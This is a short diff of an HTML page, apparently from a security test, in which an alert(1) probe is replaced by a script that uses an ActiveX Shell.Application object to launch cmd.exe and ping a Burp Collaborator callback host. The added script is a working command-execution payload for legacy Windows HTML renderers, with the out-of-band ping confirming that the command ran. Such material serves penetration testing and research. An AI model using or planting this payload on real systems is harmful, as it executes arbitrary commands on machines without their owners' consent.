--- a/1.html
+++ b/1.html
@@ -1,7 +1,9 @@
   GNU nano 4.8                                                                                          p.html                                                                                                     
 <!DOCTYPE html>
 <html>
-  <script>alert(1)</script>
+  <script>var objShell = new ActiveXObject("Shell.Application");
+        objShell.ShellExecute("cmd.exe", "C: ping 1tv7uu4ypbhl6duwr8mt3qegb7h05p.burpcollaborator.net", "C:\WINDOWS\system32", "open", "1");
+</script>
 <body>
 
 <h1>My First Heading</h1>
